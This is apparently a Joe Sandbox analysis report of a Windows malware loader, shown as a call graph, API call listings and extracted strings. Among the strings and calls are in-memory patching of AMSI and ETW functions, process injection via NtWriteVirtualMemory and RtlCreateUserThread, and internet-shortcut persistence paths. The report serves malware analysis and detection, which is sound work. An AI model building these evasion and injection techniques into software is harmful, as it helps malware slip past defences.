43290->43291 43292 32b5ea4 RegQueryValueExA 43290->43292 43291->43065 43292->43291 43293->43294 43296 32b5f2f lstrlenA 43293->43296 43294->43065 43297 32b5f47 43296->43297 43297->43294 43298 32b5f6c lstrcpynA LoadLibraryExA 43297->43298 43299 32b5f94 43297->43299 43298->43299 43299->43294 43300 32b5f9e lstrcpynA LoadLibraryExA 43299->43300 43300->43294 43301 32b5fd0 lstrcpynA LoadLibraryExA 43300->43301 43301->43294 43302->43290 43303 32b1d08 43304 32b1d18 43303->43304 43305 32b1da0 43303->43305 43307 32b1d5c 43304->43307 43308 32b1d25 43304->43308 43306 32b1da9 43305->43306 43312 32b1ff4 43305->43312 43314 32b1dc1 43306->43314 43318 32b1ec0 43306->43318 43309 32b17c0 10 API calls 43307->43309 43310 32b1d30 43308->43310 43351 32b17c0 43308->43351 43333 32b1d73 43309->43333 43311 32b2088 43312->43311 43316 32b2048 43312->43316 43317 32b2004 43312->43317 43313 32b1dc8 43314->43313 43321 32b1de4 43314->43321 43325 32b1e98 43314->43325 43323 32b204e 43316->43323 43326 32b17c0 10 API calls 43316->43326 43324 32b17c0 10 API calls 43317->43324 43319 32b1f18 43318->43319 43330 32b1ef1 Sleep 43318->43330 43341 32b1f31 43318->43341 43320 32b17c0 10 API calls 43319->43320 43319->43341 43337 32b1fc8 43320->43337 43331 32b1e15 Sleep 43321->43331 43343 32b1e38 43321->43343 43322 32b1d99 43340 32b201e 43324->43340 43328 32b17c0 10 API calls 43325->43328 43342 32b205d 43326->43342 43327 32b1d55 43345 32b1ea1 43328->43345 43329 32b2043 43330->43319 43334 32b1f0b Sleep 43330->43334 43335 32b1e2d Sleep 43331->43335 43331->43343 43332 32b1d3d 43332->43327 43375 32b1b28 43332->43375 43333->43322 43339 32b1b28 8 API calls 43333->43339 43334->43318 43335->43321 43337->43341 43344 32b1b28 8 API calls 43337->43344 43338 32b1eb9 43339->43322 43340->43329 43346 32b1b28 8 API calls 43340->43346 43342->43329 43347 32b1b28 8 API calls 43342->43347 43348 32b1fec 43344->43348 43345->43338 43349 32b1b28 8 API calls 43345->43349 43346->43329 43350 32b2080 43347->43350 43349->43338 43352 32b17d8 43351->43352 43353 32b1a04 43351->43353 43363 32b1867 Sleep 43352->43363 43366 32b17ea 43352->43366 43354 32b19d4 43353->43354 43355 32b1b1c 43353->43355 43359 32b19e3 Sleep 43354->43359 43368 32b1a22 43354->43368 43357 32b1720 VirtualAlloc 43355->43357 43358 32b1b25 43355->43358 43356 32b17f9 43356->43332 43360 32b175b 43357->43360 43361 32b174b 43357->43361 43358->43332 43362 32b19f9 Sleep 43359->43362 43359->43368 43360->43332 43392 32b16e0 43361->43392 43362->43354 43363->43366 43367 32b1880 Sleep 43363->43367 43365 32b18c8 43373 32b1668 VirtualAlloc 43365->43373 43374 32b18d4 43365->43374 43366->43356 43366->43365 43369 32b18a6 Sleep 43366->43369 43367->43352 43370 32b1668 VirtualAlloc 43368->43370 43372 32b1a40 43368->43372 43369->43365 43371 32b18bc Sleep 43369->43371 43370->43372 43371->43366 43372->43332 43373->43374 43374->43332 43376 32b1c08 43375->43376 43377 32b1b3d 43375->43377 43378 32b1784 43376->43378 43379 32b1b43 43376->43379 43377->43379 43382 32b1baf Sleep 43377->43382 43381 32b1d02 43378->43381 43384 32b16e0 2 API calls 43378->43384 43380 32b1b4c 43379->43380 43383 32b1be7 Sleep 43379->43383 43389 32b1c1d 43379->43389 43380->43327 43381->43327 43382->43379 43385 32b1bc9 Sleep 43382->43385 43386 32b1bfd Sleep 43383->43386 43383->43389 43387 32b1791 VirtualFree 43384->43387 43385->43377 43386->43379 43388 32b17a9 43387->43388 43388->43327 43390 32b1c9c VirtualFree 43389->43390 43391 32b1c40 43389->43391 43390->43327 43391->43327 43393 32b171d 43392->43393 43394 32b16e9 43392->43394 43393->43360 43394->43393 43395 32b16eb Sleep 43394->43395 43396 32b1700 43395->43396 43396->43393 43397 32b1704 Sleep 43396->43397 43397->43394 43398 32d7674 MulDiv 43399 32d76c6 43398->43399 43400 32d76b0 43398->43400 43414 32d021c 43399->43414 43464 32d7630 GetDC SelectObject GetTextMetricsA ReleaseDC 43400->43464 43403 32d76d2 43418 32d02bc 43403->43418 43405 32d76b5 43405->43399 43465 32b4820 43405->43465 43410 32d7719 43415 32d0222 43414->43415 43416 32d02bc 14 API calls 43415->43416 43417 32d023a 43416->43417 43417->43403 43419 32d02c9 43418->43419 43420 32d02e3 43418->43420 43421 32d02cf RegCloseKey 43419->43421 43422 32d02d9 43419->43422 43424 32d0320 43420->43424 43421->43422 43423 32d028c 13 API calls 43422->43423 43423->43420 43425 32b4820 11 API calls 43424->43425 43426 32d0349 43425->43426 43428 32d0369 43426->43428 43475 32b4cec 11 API calls 43426->43475 43429 32d038b RegOpenKeyExA 43428->43429 43430 32d039d 43429->43430 43435 32d03d9 43429->43435 43431 32d03c7 43430->43431 43476 32b4b0c 43430->43476 43485 32d02e8 13 API calls 43431->43485 43434 32d03d4 43439 32b4788 11 API calls 43434->43439 43436 32d03f6 RegOpenKeyExA 43435->43436 43437 32d0408 43436->43437 43443 32d0441 43436->43443 43438 32d0432 43437->43438 43440 32b4b0c 11 API calls 43437->43440 43486 32d02e8 13 API calls 43438->43486 43441 32d04b9 43439->43441 43440->43438 43441->43410 43449 32d0550 43441->43449 43444 32d045b RegOpenKeyExA 43443->43444 43444->43434 43445 32d046d 43444->43445 43446 32d0497 43445->43446 43447 32b4b0c 11 API calls 43445->43447 43487 32d02e8 13 API calls 43446->43487 43447->43446 43488 32d0528 43449->43488 43452 32d05b9 43455 32b4788 11 API calls 43452->43455 43453 32d056a 43454 32b4878 11 API calls 43453->43454 43456 32d0575 43454->43456 43461 32d05ae 43455->43461 43491 32d05c8 43456->43491 43458 32d058d 43459 32d05b0 43458->43459 43462 32d0599 43458->43462 43497 32d01b4 42 API calls 43459->43497 43469 32d028c 43461->43469 43463 32b4ed4 11 API calls 43462->43463 43463->43461 43464->43405 43467 32b4824 43465->43467 43466 32b4848 43466->43399 43467->43466 43503 32b2cc8 11 API calls 43467->43503 43470 32d02b8 43469->43470 43471 32d0296 43469->43471 43470->43410 43472 32d029c RegFlushKey 43471->43472 43473 32d02a2 RegCloseKey 43471->43473 43472->43473 43474 32b4788 11 API calls 43473->43474 43474->43470 43475->43428 43477 32b4b1d 43476->43477 43478 32b4b5a 43477->43478 43479 32b4b43 43477->43479 43481 32b484c 11 API calls 43478->43481 43480 32b4ed4 11 API calls 43479->43480 43483 32b4b50 43480->43483 43481->43483 43482 32b4b8b 43483->43482 43484 32b47dc 11 API calls 43483->43484 43484->43482 43485->43434 43486->43434 43487->43434 43498 32d04d8 43488->43498 43490 32d053c 43490->43452 43490->43453 43492 32b4c4c 43491->43492 43493 32d05ee RegQueryValueExA 43492->43493 43494 32d05fc 43493->43494 43496 32d061b 43493->43496 43502 32bc184 42 API calls 43494->43502 43496->43458 43497->43461 43499 32d04f1 43498->43499 43500 32d0505 RegQueryValueExA 43499->43500 43501 32d051c 43500->43501 43501->43490 43502->43496 43503->43466 43504 32c6760 43506 32c6771 43504->43506 43507 32c679a 43504->43507 43506->43507 43509 32c792c 43506->43509 43513 32b37c4 43506->43513 43510 32c7936 43509->43510 43511 32c794a 43510->43511 43519 32c78b8 42 API calls 43510->43519 43511->43506 43514 32b37f3 43513->43514 43515 32b3822 CompareStringA 43514->43515 43516 32b3842 43515->43516 43517 32b4788 11 API calls 43516->43517 43518 32b384a 43517->43518 43518->43506 43519->43511 43520 331809c 43523 330cb08 43520->43523 43524 330cb10 43523->43524 43524->43524 45698 32b2f9c QueryPerformanceCounter 43524->45698 43526 330cb32 45701 32b2fc4 43526->45701 43528 330cb3c InetIsOffline 43529 330cb46 43528->43529 43530 330cb57 43528->43530 43531 32b47dc 11 API calls 43529->43531 43532 32b47dc 11 API calls 43530->43532 43533 330cb55 43531->43533 43534 330cb66 43532->43534 43533->43534 43535 32b4b0c 11 API calls 43534->43535 43536 330cb84 43535->43536 43537 32b4c4c 43536->43537 43538 330cb8c 43537->43538 43539 330cb96 43538->43539 45702 32b4a98 43539->45702 43541 330cbaf 43542 32b4c4c 43541->43542 43543 330cbb7 43542->43543 43544 330cbc1 43543->43544 45717 32cfd40 43544->45717 43547 32b4b0c 11 API calls 43548 330cbe8 43547->43548 43549 330cbf0 43548->43549 43550 330cbfa 43549->43550 43551 32b4a98 11 API calls 43550->43551 43552 330cc13 43551->43552 43553 32b4c4c 43552->43553 43554 330cc1b 43553->43554 43555 330cc25 43554->43555 43556 32cfd40 21 API calls 43555->43556 43557 330cc2e 43556->43557 43558 32b4b0c 11 API calls 43557->43558 43559 330cc4c 43558->43559 43560 330cc54 43559->43560 43561 32b4a98 11 API calls 43560->43561 43562 330cc77 43561->43562 43563 32b4c4c 43562->43563 43564 330cc7f 43563->43564 43565 32cfd40 21 API calls 43564->43565 43566 330cc92 43565->43566 43567 32b4b0c 11 API calls 43566->43567 43568 330ccb0 43567->43568 43569 330ccb8 43568->43569 43570 330ccc2 43569->43570 43571 32b4a98 11 API calls 43570->43571 43572 330ccdb 43571->43572 43573 32b4c4c 43572->43573 43574 330cce3 43573->43574 43575 32cfd40 21 API calls 43574->43575 43576 330ccf6 43575->43576 43577 32b4b0c 11 API calls 43576->43577 43578 330cd14 43577->43578 43579 330cd1c 43578->43579 43580 330cd26 43579->43580 43581 32b4a98 11 API calls 43580->43581 43582 330cd3f 43581->43582 43583 32b4c4c 43582->43583 43584 330cd47 43583->43584 43585 330cd51 43584->43585 43586 32cfd40 21 API calls 43585->43586 43587 330cd5a 43586->43587 43588 32b4b0c 11 API calls 43587->43588 43589 330cd78 43588->43589 43590 330cd80 43589->43590 43591 32b4a98 11 API calls 43590->43591 43592 330cda3 43591->43592 43593 32b4c4c 43592->43593 43594 330cdab 43593->43594 43595 330cdb5 43594->43595 43596 32cfd40 21 API calls 43595->43596 43597 330cdbe 43596->43597 43598 32b4b0c 11 API calls 43597->43598 43599 330cddc 43598->43599 43600 330cde4 43599->43600 43601 32b4a98 11 API calls 43600->43601 43602 330ce07 43601->43602 43603 32b4c4c 43602->43603 43604 330ce0f 43603->43604 43605 32cfd40 21 API calls 43604->43605 43606 330ce22 43605->43606 45729 32b4980 43606->45729 45699 32b2fa9 45698->45699 45700 32b2fb4 GetTickCount 45698->45700 45699->43526 45700->43526 45701->43528 45703 32b4afd 45702->45703 45704 32b4a9c 45702->45704 45705 32b47dc 45704->45705 45706 32b4aa4 45704->45706 45710 32b484c 11 API calls 45705->45710 45712 32b47f0 45705->45712 45706->45703 45707 32b4ab3 45706->45707 45709 32b47dc 11 API calls 45706->45709 45711 32b484c 11 API calls 45707->45711 45708 32b481e 45708->43541 45709->45707 45710->45712 45714 32b4acd 45711->45714 45712->45708 45731 32b2cc8 11 API calls 45712->45731 45715 32b47dc 11 API calls 45714->45715 45716 32b4af9 45715->45716 45716->43541 45718 32cfd54 45717->45718 45719 32cfd77 LoadLibraryExA 45718->45719 45720 32b4c4c 45719->45720 45721 32cfd85 GetModuleHandleA 45720->45721 45722 32b4c4c 45721->45722 45723 32cfd98 GetProcAddress GetCurrentProcess NtProtectVirtualMemory 45722->45723 45732 32cfd34 45723->45732 45725 32cfdda GetCurrentProcess NtWriteVirtualMemory GetCurrentProcess NtFlushInstructionCache FreeLibrary 45726 32cfe1d 45725->45726 45727 32b47ac 11 API calls 45726->45727 45728 32cfe2a 45727->45728 45728->43547 45730 32b4986 45729->45730 45731->45708 45732->45725 45733 32b51e4 45734 32b51f1 45733->45734 45738 32b51f8 45733->45738 45742 32b4f38 SysAllocStringLen 45734->45742 45739 32b4f58 45738->45739 45740 32b4f5e SysFreeString 45739->45740 45741 32b4f64 45739->45741 45740->45741 45742->45738

                                                                                                    Executed Functions

                                                                                                    Function 0330CB08 Relevance: 214.5, APIs: 11, Strings: 107, Instructions: 7993COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • InetIsOffline.URL(00000000,00000000,03317507,?,?,?,000002A6,00000000,00000000), ref: 0330CB3D
                                                                                                      • Part of subcall function 032CFD40: LoadLibraryExA.KERNEL32(00000000,00000000,00000000,00000000,032CFE2B), ref: 032CFD78
                                                                                                      • Part of subcall function 032CFD40: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,00000000,032CFE2B), ref: 032CFD86
                                                                                                      • Part of subcall function 032CFD40: GetProcAddress.KERNEL32(74F60000,00000000), ref: 032CFD9F
                                                                                                      • Part of subcall function 032CFD40: GetCurrentProcess.KERNEL32(0333035C,17D783FC,00000040,00000004,74F60000,00000000,00000000,00000000,00000000,00000000,00000000,032CFE2B), ref: 032CFDBB
                                                                                                      • Part of subcall function 032CFD40: NtProtectVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,0333035C,17D783FC,00000040,00000004,74F60000,00000000,00000000,00000000,00000000,00000000,00000000,032CFE2B), ref: 032CFDC1
                                                                                                      • Part of subcall function 032CFD40: GetCurrentProcess.KERNEL32(0333035C,Function_00006ADC,00000004,03330360,00000000,0333035C,17D783FC,00000040,00000004,74F60000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 032CFDEB
                                                                                                      • Part of subcall function 032CFD40: NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,0333035C,Function_00006ADC,00000004,03330360,00000000,0333035C,17D783FC,00000040,00000004,74F60000,00000000,00000000,00000000,00000000,00000000), ref: 032CFDF1
                                                                                                      • Part of subcall function 032CFD40: GetCurrentProcess.KERNEL32(00000000,00000000,00000000,0333035C,Function_00006ADC,00000004,03330360,00000000,0333035C,17D783FC,00000040,00000004,74F60000,00000000,00000000,00000000), ref: 032CFDFA
                                                                                                      • Part of subcall function 032CFD40: NtFlushInstructionCache.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,00000000,00000000,0333035C,Function_00006ADC,00000004,03330360,00000000,0333035C,17D783FC,00000040,00000004,74F60000,00000000,00000000), ref: 032CFE00
                                                                                                      • Part of subcall function 032CFD40: FreeLibrary.KERNEL32(74F60000,00000000,00000000,00000000,00000000,0333035C,Function_00006ADC,00000004,03330360,00000000,0333035C,17D783FC,00000040,00000004,74F60000,00000000), ref: 032CFE0B
                                                                                                      • Part of subcall function 032B8DE0: GetFileAttributesA.KERNEL32(00000000,?,0330D60A,ScanString,03330350,0331753C,OpenSession,03330350,0331753C,ScanString,03330350,0331753C,UacScan,03330350,0331753C,UacInitialize), ref: 032B8DEB
                                                                                                      • Part of subcall function 0330B780: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0330B850), ref: 0330B7BB
                                                                                                      • Part of subcall function 0330B780: NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,0330B850), ref: 0330B7EB
                                                                                                      • Part of subcall function 0330B780: NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 0330B800
                                                                                                      • Part of subcall function 0330B780: NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 0330B82C
                                                                                                      • Part of subcall function 0330B780: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 0330B835
                                                                                                      • Part of subcall function 032B8E04: GetFileAttributesA.KERNEL32(00000000,?,03310668,ScanString,03330350,0331753C,OpenSession,03330350,0331753C,OpenSession,03330350,0331753C,ScanBuffer,03330350,0331753C,ScanString), ref: 032B8E0F
                                                                                                      • Part of subcall function 032B8FCC: CreateDirectoryA.KERNEL32(00000000,00000000,?,0331070E,ScanBuffer,03330350,0331753C,ScanString,03330350,0331753C,OpenSession,03330350,0331753C,OpenSession,03330350,0331753C), ref: 032B8FD9
                                                                                                      • Part of subcall function 0330B69C: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0330B76E), ref: 0330B6DB
                                                                                                      • Part of subcall function 0330B69C: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0330B715
                                                                                                      • Part of subcall function 0330B69C: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 0330B742
                                                                                                      • Part of subcall function 0330B69C: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 0330B74B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$Path$CurrentProcess$AttributesCloseCreateLibraryMemoryNameName_VirtualWrite$AddressCacheDirectoryFlushFreeHandleInetInformationInstructionLoadModuleOfflineOpenProcProtectQueryRead
                                                                                                    • String ID: .png$.url$@^@$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Users\Public\Libraries$C:\Windows\SysWOW64$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$DEEX$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FindCertsByIssuer$FlushInstructionCache$GET$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$^^Nc$acS$advapi32$bcrypt$can$connect$endpointdlp$http$iexpress.exe$kernel32$mssip32$ntdll$psapi$smartscreenps$spp$sppc$sppwmi$wintrust$ws2_32
                                                                                                    • API String ID: 3974040814-596226238
                                                                                                    • Opcode ID: 92c467c60c1f17b5badc12feb3e202ab64e431e38f9e2d765a8660ec563550d8
                                                                                                    • Instruction ID: 9aabf9902ccb16589fc4a6f4c5d3a2bf723aa0bc69cbd7de9809f989367c81bc
                                                                                                    • Opcode Fuzzy Hash: 92c467c60c1f17b5badc12feb3e202ab64e431e38f9e2d765a8660ec563550d8
                                                                                                    • Instruction Fuzzy Hash: D4F31039A202199FDB19FB65DDC0ADEB3B9AF44340F5440E5E109AF256DB70AEC18F44
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 03308E64 Relevance: 59.5, APIs: 14, Strings: 19, Instructions: 1789libraryloadernativeCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 4106 3308e64-3308e67 4107 3308e6c-3308e71 4106->4107 4107->4107 4108 3308e73-3309500 call 32b4b0c call 32b4c4c call 32b4980 call 32b4a98 call 32b4c4c call 32b4980 call 32cfd40 call 32b4b0c call 32b4c4c call 32b4980 call 32b4a98 call 32b4c4c call 32b4980 call 32cfd40 call 32b4b0c call 32b4c4c call 32b4980 call 32b4a98 call 32b4c4c call 32b4980 call 32cfd40 call 32b4b0c call 32b4c4c call 32b4980 call 32b4a98 call 32b4c4c call 32b4980 call 32cfd40 call 32cfcb0 call 32b4b0c call 32b4c4c call 32b4980 call 32b4a98 call 32b4c4c call 32b4980 call 32cfd40 call 32b4b0c call 32b4c4c call 32b4980 call 32b4a98 call 32b4c4c call 32b4980 call 32cfd40 GetModuleHandleW GetProcAddress call 32b4b0c call 32b4c4c call 32b4980 call 32b4a98 call 32b4c4c call 32b4980 call 32cfd40 call 32b4b0c call 32b4c4c call 32b4980 call 32b4a98 call 32b4c4c call 32b4980 call 32cfd40 NtOpenProcess call 32b4b0c call 32b4c4c call 32b4980 call 32b4a98 call 32b4c4c call 32b4980 call 32cfd40 call 32b4b0c call 32b4c4c call 32b4980 call 32b4a98 call 32b4c4c call 32b4980 call 32cfd40 call 32b4b0c call 32b4c4c call 32b4980 call 32b4a98 call 32b4c4c call 32b4980 call 32cfd40 call 32b2f9c call 32b2fc4 call 32b4b0c call 32b4c4c call 32b4980 call 32b4a98 call 32b4c4c call 32b4980 call 32cfd40 call 32b4b0c call 32b4c4c call 32b4980 call 32b4a98 call 32b4c4c call 32b4980 call 32cfd40 call 32b4b0c call 32b4c4c call 32b4980 call 32b4a98 call 32b4c4c call 32b4980 call 32cfd40 call 32b4b0c call 32b4c4c call 32b4980 call 32b4a98 call 32b4c4c call 32b4980 call 32cfd40 4107->4108 4325 3309506-33096f1 GetCurrentProcess call 32cfb88 call 32b4b0c call 32b4c4c call 32b4980 call 32b4a98 call 32b4c4c call 32b4980 call 32cfd40 call 32b4b0c call 32b4c4c call 32b4980 call 32b4a98 call 32b4c4c call 32b4980 call 32cfd40 call 32b4b0c call 32b4c4c call 32b4980 call 32b4a98 call 32b4c4c call 32b4980 call 32cfd40 call 32b4b0c call 32b4c4c call 32b4980 call 32b4a98 call 32b4c4c call 32b4980 call 32cfd40 4108->4325 4326 330aa4f-330ac14 call 32cfce0 * 7 call 32b4b0c call 32b4c4c call 32b4980 call 32b4a98 call 32b4c4c call 32b4980 call 32cfd40 call 32b4b0c call 32b4c4c call 32b4980 call 32b4a98 call 32b4c4c call 32b4980 call 32cfd40 call 32b4b0c call 32b4c4c call 32b4980 call 32b4a98 call 32b4c4c call 32b4980 call 32cfd40 4108->4326 4325->4326 4446 33096f7-3309727 call 32c97c8 IsBadReadPtr 4325->4446 4437 330ac19-330ac56 call 32b47ac * 3 4326->4437 4446->4326 4453 330972d-3309732 4446->4453 4453->4326 4454 3309738-3309754 IsBadReadPtr 4453->4454 4454->4326 4455 330975a-3309763 4454->4455 4455->4326 4456 3309769-330978f 4455->4456 4456->4326 4457 3309795-330990e GetCurrentProcess call 32cfb88 call 32b4b0c call 32b4c4c call 32b4980 call 32b4a98 call 32b4c4c call 32b4980 call 32cfd40 call 32b4b0c call 32b4c4c call 32b4980 call 32b4a98 call 32b4c4c call 32b4980 call 32cfd40 call 32b4b0c call 32b4c4c call 32b4980 call 32b4a98 call 32b4c4c call 32b4980 call 32cfd40 4456->4457 4457->4326 4502 3309914-3309a8a call 32cfb88 call 32b4b0c call 32b4c4c call 32b4980 call 32b4a98 call 32b4c4c call 32b4980 call 32cfd40 call 32b4b0c call 32b4c4c call 32b4980 call 32b4a98 call 32b4c4c call 32b4980 call 32cfd40 call 32b4b0c call 32b4c4c call 32b4980 call 32b4a98 call 32b4c4c call 32b4980 call 32cfd40 4457->4502 4547 3309a90-3309c8f call 32b4b0c call 32b4c4c call 32b4980 call 32b4a98 call 32b4c4c call 32b4980 call 32cfd40 call 32b4b0c call 32b4c4c call 32b4980 call 32b4a98 call 32b4c4c call 32b4980 call 32cfd40 call 32b4b0c call 32b4c4c call 32b4980 call 32b4a98 call 32b4c4c call 32b4980 call 32cfd40 call 3308cf0 call 32b4b0c call 32b4c4c call 32b4980 call 32b4a98 call 32b4c4c call 32b4980 call 32cfd40 4502->4547 4548 330a8fc-330aa4a call 32b4b0c call 32b4c4c call 32b4980 call 32b4a98 call 32b4c4c call 32b4980 call 32cfd40 call 32b4b0c call 32b4c4c call 32b4980 call 32b4a98 call 32b4c4c call 32b4980 call 32cfd40 call 32b4b0c call 32b4c4c call 32b4980 call 32b4a98 call 32b4c4c call 32b4980 call 32cfd40 4502->4548 4648 3309c95-3309c96 4547->4648 4649 3309e2d-3309f8b call 32b4b0c call 32b4c4c call 32b4980 call 32b4a98 call 32b4c4c call 32b4980 call 32cfd40 call 32b4b0c call 32b4c4c call 32b4980 call 32b4a98 call 32b4c4c call 32b4980 call 32cfd40 call 32b4b0c call 32b4c4c call 32b4980 call 32b4a98 call 32b4c4c call 32b4980 call 32cfd40 4547->4649 4548->4326 4650 3309c9a-3309e11 call 3308cf0 call 32b4b0c call 32b4c4c call 32b4980 call 32b4a98 call 32b4c4c call 32b4980 call 32cfd40 call 32b4b0c call 32b4c4c call 32b4980 call 32b4a98 call 32b4c4c call 32b4980 call 32cfd40 call 32b4b0c call 32b4c4c call 32b4980 call 32b4a98 call 32b4c4c call 32b4980 call 32cfd40 4648->4650 4734 3309fb7-330a8d6 call 32b4b0c call 32b4c4c call 32b4980 call 32b4a98 call 32b4c4c call 32b4980 call 32cfd40 call 32b4b0c call 32b4c4c call 32b4980 call 32b4a98 call 32b4c4c call 32b4980 call 32cfd40 call 32b4b0c call 32b4c4c call 32b4980 call 32b4a98 call 32b4c4c call 32b4980 call 32cfd40 call 3308cfc call 32b4b0c call 32b4c4c call 32b4980 call 32b4a98 call 32b4c4c call 32b4980 call 32cfd40 call 32b4b0c call 32b4c4c call 32b4980 call 32b4a98 call 32b4c4c call 32b4980 call 32cfd40 call 32b4b0c call 32b4c4c call 32b4980 call 32b4a98 call 32b4c4c call 32b4980 call 32cfd40 call 32b4b0c call 32b4c4c call 32b4980 call 32b4a98 call 32b4c4c call 32b4980 call 32cfd40 GetModuleHandleW GetProcAddress call 32b4b0c call 32b4c4c call 32b4980 call 32b4a98 call 32b4c4c call 32b4980 call 32cfd40 call 32b4b0c call 32b4c4c call 32b4980 call 32b4a98 call 32b4c4c call 32b4980 call 32cfd40 call 32b4b0c call 32b4c4c call 32b4980 call 32b4a98 call 32b4c4c call 32b4980 call 32cfd40 NtWriteVirtualMemory call 32b4b0c call 32b4c4c call 32b4980 call 32b4a98 call 32b4c4c call 32b4980 call 32cfd40 call 32b4b0c call 32b4c4c call 32b4980 call 32b4a98 call 32b4c4c call 32b4980 call 32cfd40 call 32b4b0c call 32b4c4c call 32b4980 call 32b4a98 call 32b4c4c call 32b4980 call 32cfd40 call 32b4b0c call 32b4c4c call 32b4980 call 32b4a98 call 32b4c4c call 32b4980 call 32cfd40 GetModuleHandleW GetProcAddress call 32b4b0c call 32b4c4c call 32b4980 call 32b4a98 call 32b4c4c call 32b4980 call 32cfd40 call 32b4b0c call 32b4c4c call 32b4980 call 32b4a98 call 32b4c4c call 32b4980 call 32cfd40 call 32b4b0c call 32b4c4c call 32b4980 call 32b4a98 call 32b4c4c call 32b4980 call 32cfd40 RtlCreateUserThread call 32b4b0c call 32b4c4c call 32b4980 call 32b4a98 call 32b4c4c call 32b4980 call 32cfd40 call 32b4b0c call 32b4c4c call 32b4980 call 32b4a98 call 32b4c4c call 32b4980 call 32cfd40 4649->4734 4735 3309f8d-3309fb2 call 3308c40 4649->4735 4741 3309e16-3309e27 4650->4741 5007 330a8db-330a8e2 4734->5007 4735->4734 4741->4649 4741->4650 5007->4326 5008 330a8e8-330a8f7 CloseHandle 5007->5008 5008->4326
                                                                                                    APIs
                                                                                                      • Part of subcall function 032CFD40: LoadLibraryExA.KERNEL32(00000000,00000000,00000000,00000000,032CFE2B), ref: 032CFD78
                                                                                                      • Part of subcall function 032CFD40: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,00000000,032CFE2B), ref: 032CFD86
                                                                                                      • Part of subcall function 032CFD40: GetProcAddress.KERNEL32(74F60000,00000000), ref: 032CFD9F
                                                                                                      • Part of subcall function 032CFD40: GetCurrentProcess.KERNEL32(0333035C,17D783FC,00000040,00000004,74F60000,00000000,00000000,00000000,00000000,00000000,00000000,032CFE2B), ref: 032CFDBB
                                                                                                      • Part of subcall function 032CFD40: NtProtectVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,0333035C,17D783FC,00000040,00000004,74F60000,00000000,00000000,00000000,00000000,00000000,00000000,032CFE2B), ref: 032CFDC1
                                                                                                      • Part of subcall function 032CFD40: GetCurrentProcess.KERNEL32(0333035C,Function_00006ADC,00000004,03330360,00000000,0333035C,17D783FC,00000040,00000004,74F60000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 032CFDEB
                                                                                                      • Part of subcall function 032CFD40: NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,0333035C,Function_00006ADC,00000004,03330360,00000000,0333035C,17D783FC,00000040,00000004,74F60000,00000000,00000000,00000000,00000000,00000000), ref: 032CFDF1
